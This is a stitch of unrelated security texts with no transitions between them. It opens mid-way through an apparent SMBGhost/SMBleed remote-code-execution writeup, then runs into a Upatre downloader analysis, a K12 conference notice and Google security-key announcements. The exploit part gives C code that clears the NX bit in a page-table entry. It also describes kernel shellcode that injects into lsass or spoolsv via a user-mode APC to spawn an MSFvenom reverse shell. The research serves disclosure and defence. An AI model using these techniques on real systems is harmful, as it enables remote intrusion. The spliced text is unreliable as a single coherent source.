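static uint64_t pte_address(uint64_t pte_base, uint64_t va)
{
    /* Drop the 12-bit page offset and index into the self-mapped page tables. */
    return pte_base + ((va >> 9) & 0x7FFFFFFFF8ULL);
}

static void make_executable(volatile uint64_t *pte)
{
    *pte &= ~(1ULL << 63);   /* clear the NX bit of the page table entry */
}

/* Conceptual usage, performed on the target via the write-what-where primitive:
 *   make_executable((uint64_t *)pte_address(pte_base, 0xFFFFF78000000800ULL));
 */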

Launching a reverse shell

Technically, we achieved remote code execution, so we could stop here. But if we’re not popping calc or launching a reverse shell, the POC is not complete, so we went on to fill that gap. Since our shellcode runs in kernel mode, we can’t just run cmd.exe or calc.exe and call it a day. We needed to find a way to get our code to run in user mode. While searching for prior work on the topic we found sleepya’s shellcode, written originally for EternalBlue exploits, which is designed to do just that. 

In short, here’s what the shellcode does:

  1. Hook IA32_LSTAR MSR to lower the IRQL (Interrupt Request Level) from DISPATCH_LEVEL to PASSIVE_LEVEL. The shellcode begins execution at the DISPATCH_LEVEL IRQL which imposes several limitations. For more information see the great explanation of zerosum0x0.
  2. Find a privileged user mode process (lsass.exe or spoolsv.exe) and queue a user mode APC in one of the alertable threads that is in waiting state.
  3. In the APC kernel routine, allocate EXECUTE_READWRITE memory and point the APC normal (user mode) routine there. Then copy the user mode shellcode to the newly allocated memory, prepended with a stub to create a new thread.
  4. In the APC normal routine a new thread is created, executing the user mode shellcode.

Published about three years ago, the shellcode didn’t work right away on recent Windows versions, so we had to make a couple of adjustments:

  1. Incompatibility with the KVA Shadow mitigation. In the blog post Fixing Remote Windows Kernel Payloads to Bypass Meltdown KVA Shadow zerosum0x0 explains why the first part of the shellcode, IA32_LSTAR MSR hooking, isn’t supported when the KVA Shadow mitigation is enabled, and proposes a fix. We tried the proposed fix, but it didn’t work on newer Windows versions – zerosum0x0 targeted Windows 10 version 1809 while we were targeting versions 1903 and 1909. The right thing to do is to improve the fix or find another solution, but we just removed the IRQL lowering part. As a result, the POC can sometimes crash the system while trying to access paged memory (bug check IRQL_NOT_LESS_OR_EQUAL), but it doesn’t happen often, so we left it as is since it’s good enough for a POC.
  2. Fixed finding the base address of ntoskrnl.exe. At first, we tried using zerosum0x0’s method – get an address of the first ISR (Interrupt Service Routine), which is located in ntoskrnl.exe, and search for a nearby PE header. The method didn’t work for us since the ISR pointer points to ntoskrnl’s INITKDBG section which is not mapped. Since we already found the ntoskrnl.exe base address, we fixed it by just passing it as an argument to the shellcode.
  3. Fixed a problem with finding the offset of ETHREAD.ThreadListEntry. The original code looked for the current thread in the thread list of the current process. The thread won’t be found if the current thread is attached to a different process than the one it was originally created in (see KeStackAttachProcess).
  4. Fixed the UserApcPending check in the KAPC_STATE struct for Windows 10 RS5 and newer. Since Windows 10 RS5, UserApcPending shares a byte with the newly added bit value SpecialUserApcPending.

With the above fixed, we finally managed to make the shellcode work, we just needed to fill in the user mode part of the code to run. We used MSFvenom, the Metasploit payload generator, to generate a user mode shellcode to spawn a reverse shell.

Targets with more than one logical processor

In the Observation #1 section of the previous part of the writeup we assumed that our target has only one logical processor. With this assumption, we could rely on the lookaside lists reusing buffers, knowing that we get the same buffer every time as long as the allocation size is the same. As a reminder, the lookaside lists are created upon initialization, a list for each size and logical processor, as depicted in the following table:

                     Allocation size
Logical processor    0x1100  0x2100  0x4100  0x8100  0x10100  0x20100  0x40100  0x80100  0x100100
Processor 1            📝      📝      📝      📝      📝       📝       📝       📝        📝
Processor 2            📝      📝      📝      📝      📝       📝       📝       📝        📝
Processor n            📝      📝      📝      📝      📝       📝       📝       📝        📝

Each cell with the “📝” symbol is a separate lookaside list.

With more than one logical processor, things are a bit more complicated – we get the same buffer only as long as the allocation is made on the same logical processor. Our first attempt at overcoming this limitation was redundancy. When writing to one of the lookaside list buffers, write multiple times. When reading from one of the lookaside list buffers, read multiple times and choose the most common value. This approach would work if the logical processor usage was distributed evenly, but we found that it’s not the case. We tested our POC in VirtualBox, and from our observations, some logical processors are preferred over others. For a setup of 4 logical cores, here’s the distribution of handling the incoming packet in a test execution:

Logical processor      Incoming packets handled
Logical processor 1    0.2%
Logical processor 2    0.8%
Logical processor 3    7.9%
Logical processor 4    91.1%

Here’s the distribution of handling the decompression:

Logical processor      Decompressions executed
Logical processor 1    13.3%
Logical processor 2    5.1%
Logical processor 3    6.8%
Logical processor 4    74.8%

As you can see, in this specific case logical processor 4 did most of the work. Logical processor 1 handled only 1 out of every 500 incoming packets!

We tweaked the POC such that it sends several packets simultaneously from multiple threads to improve the logical processor usage distribution. We also added error detection, so that if the data that is read doesn’t make sense, another reading attempt is made instead of proceeding and most likely crashing the system. The changes we made were enough to make the POC work with VirtualBox targets with multiple logical processors, but from a quick test the POC doesn’t work with VMware targets or (at least some) physical computers with multiple logical processors. We didn’t try to improve the POC further to support all targets, which we believe can be achieved with a better strategy for a reading and writing order.

Our POC with the improvements can be found in the GitHub repository.

If you’d like to study the code, we suggest starting with the initial, less noisy version which was designed for a single logical processor. It can be found in a previous commit here.

ZecOps Detection

ZecOps classifies forensics logs related to this issue as #SMBGhost and #SMBleed. You can find more information on how to use ZecOps solutions for Endpoints & Servers, Mobile devices, or applications. Besides SMBleed / SMBGhost, ZecOps Crash Forensics solutions can find other, previously unknown vulnerabilities that are exploited in the wild. If you care about persistent threats, we’ll be happy to assist.

Remediation

You can remediate the impact of both issues by doing one of the following:

  • Applying the latest security updates (recommended)
  • Blocking port 445 / enforcing host isolation
  • Disabling SMBv3.1.1 compression

Summary

This is the third and final part of the writeup, in which we used the findings from the previous parts to achieve RCE using SMBGhost and SMBleed. We hope you enjoyed the read. Here’s a recap of the milestones during our research on the SMB bugs:

  1. A write-what-where primitive, demonstrated in our previous research about achieving local privilege escalation.
  2. The discovery of the SMBleed bug, described in the first part of the writeup.
  3. An ability to read memory from the pool buffers allocated by the SrvNetAllocateBuffer function, demonstrated in Part II: Unauthenticated Memory Read – Preparing the Ground for an RCE.
  4. An ability to get the base address of the srvnet.sys module.
  5. An ability to call an arbitrary function.
  6. Arbitrary memory read.
  7. Shellcode execution.

Is the Upatre downloader coming back?

Hi folks, today I want to share a quantitative analysis of a weird comeback by Upatre. According to Unit42, Upatre is an old downloader, first spotted in 2013, used to deliver banking trojans and active up to 2016.

First discovered in 2013, Upatre is primarily a downloader tool responsible for delivering additional trojans onto the victim host. It is most well-known for being tied with the Dyre banking trojan, with a peak of over 250,000 Upatre infections per month delivering Dyre back in July 2015. In November 2015 however, an organization thought to be associated with the Dyre operation was raided, and subsequently the usage of Upatre delivering Dyre dropped dramatically, to less than 600 per month by January 2016.

From PaloAlto Unit42

From 2016 until today I had never seen a new Upatre campaign, or anything like one, but something seems to have changed. While analyzing the Cyber Threats Trends findings (for an upcoming post) I spotted an interesting revival of the Upatre downloader starting from April 2020. The following image shows what I mean: zero Upatre findings until April 21, 2020, and almost 50 single detections per day since that date. Those statistics looked so strange to me that I had to doubt them, so let’s take a closer look and see whether there is some misclassification involved.

Upatre Time Distribution

Digging a little into those samples by asking VirusTotal for a second opinion, it looks like the matches are genuine. In order to verify that “revival”, I first took some random samples (with the Upatre classification tag) and then verified the malware classification and the first submission date on VirusTotal. Below is an example of the checks performed. As you can see from the following picture, 9 AV engines classified the sample as Upatre, so we can consider it neither a “false positive” nor a misclassified sample.

Upatre Correct Classification

The following image shows the “First Submission Date”, which is aligned with what I’ve seen on Cyber Threats Trends. If you take some more samples from the following list (IoC section) you will probably see many more cases similar to this one. I did many checks and wasn’t able to find any mismatches, so I decided to write up this post.

Upatre First Submission

Conclusion

It is very interesting, at least to me, to see an ancient downloader resurface in such a specific period. Many people, from April up to today, have been stuck at home in what has been called “quarantine” due to the COVID pandemic. Curiously, during this same time, while people are working from home and potentially have much more free time (since they can’t leave the house), this old downloader reappears. Maybe somebody took advantage of this bad situation to resurrect some old tools stored on a dusty external hard drive?

IoC (3384)

For the complete IoC list check it out: HERE

iKeepSafe has announced a change to a virtual format for the 2020 NICE K12 Cybersecurity Education Conference

6th Annual NICE K12 Cybersecurity Education Conference Call for Presentations: Open April 1 – June 30, 2020. In an effort to be mindful of health concerns, travel restrictions, and budget impacts, and based on the conference's continued commitment to equity and inclusion, the National Initiative for Cybersecurity Education (NICE) K12 Cybersecurity Education Conference will be reimagined to bring the community spirit and networking energy to an inspiring and engaging online space. The Conference, previously slated to take place on December 7-8, 2020 in St. Louis, Missouri, will now be a virtual event.

Making the Advanced Protection Program and Titan Security Keys easier to use on Apple iOS devices




Starting today, we’re rolling out a change that enables native support for the W3C WebAuthn implementation for Google Accounts on Apple devices running iOS 13.3 and above. This capability, available for both personal and work Google Accounts, simplifies your security key experience on compatible iOS devices and allows you to use more types of security keys for your Google Account and the Advanced Protection Program.


Using an NFC security key on iPhone

More security key choices for users
  • Both the USB-A and Bluetooth Titan Security Keys have NFC functionality built-in. This allows you to tap your key to the back of your iPhone when prompted at sign-in.
  • You can use a Lightning security key like the YubiKey 5Ci or any USB security key if you have an Apple Lightning to USB Camera Adapter.
  • You can plug a USB-C security key directly into an iOS device that has a USB-C port (such as an iPad Pro).
  • We suggest installing the Smart Lock app in order to use Bluetooth security keys and your phone’s built-in security key, which allows you to use your iPhone as an additional security key for your Google Account.
In order to add your Google Account to your iOS device, navigate to “Settings > Passwords & Accounts” on your iOS device or install the Google app and sign in.


Account security best practices


We highly recommend that users at a higher risk of targeted attacks get security keys (such as a Titan Security Key or your Android or iOS phone) and enroll in the Advanced Protection Program. If you’re working for political committees in the United States, you may be eligible to request free Titan Security Keys through the Defending Digital Campaigns and get help enrolling in Advanced Protection.

You can also use security keys for any site where FIDO security keys are supported for 2FA, including your personal or work Google Account, 1Password, Bitbucket, Bitfinex, Coinbase, Dropbox, Facebook, GitHub, Salesforce, Stripe, Twitter, and more.

The Advanced Protection Program comes to Google Nest



The Advanced Protection Program is our strongest level of Google Account security for people at high risk of targeted online attacks, such as journalists, activists, business leaders, and people working on elections. Anyone can sign up to automatically receive extra safeguards against phishing, malware, and fraudulent access to their data.

Since we launched, one of our goals has been to bring Advanced Protection’s features to other Google products. Over the years, we’ve incorporated many of them into G Suite, Google Cloud Platform, Chrome, and most recently, Android. We want as many users as possible to benefit from the additional levels of security that the Program provides.

Today we’re announcing one of the top requests we’ve received: bringing the Advanced Protection Program to Nest. Now people can seamlessly use their Google Accounts with both Advanced Protection and Google Nest devices; previously, a user could use their Google Account on only one of these at a time.

Feeling safe at home has never been more important and Nest has announced a variety of new security features this year, including using reCAPTCHA Enterprise, to significantly lower the likelihood of automated attacks. Today’s improvement adds yet another layer of protection for people with Nest devices.

For more information about using Advanced Protection with Google Nest devices, check out this article in our help center.